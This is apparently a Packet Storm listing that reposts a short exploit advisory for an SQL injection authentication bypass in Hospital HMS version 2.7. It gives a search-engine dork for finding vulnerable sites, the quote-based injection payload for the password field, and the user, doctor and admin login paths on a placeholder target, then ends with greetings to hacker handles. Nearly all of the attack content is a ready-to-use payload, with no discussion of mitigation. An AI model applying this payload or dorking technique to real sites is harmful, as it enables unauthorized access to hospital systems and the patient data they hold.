Security
Headlines
HeadlinesLatestCVEs

Headline

Hospital HMS 2.7 SQL Injection

Hospital HMS version 2.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

Packet Storm
#sql#vulnerability#windows#google#php#auth#firefox
======================================================================================================================================| # Title     : Hospital HMS v2.7 Auth by pass Vulnerability                                                                         || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                              || # Vendor    : http://apptmedical.com/                                                                                              |  | # Dork      : © 2018 HMS. All rights reserved                                                                                      |======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : admin & pass = '=' 'or'[+] user login   : http://target_site/hms/user-login.php[+] doctor Login : http://target_site/hms/doctor/[+] admin login  : http://target_site/hms/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Packet Storm: Latest News

ABB Cylon Aspect 3.08.01 vstatConfigurationDownload.php Configuration Download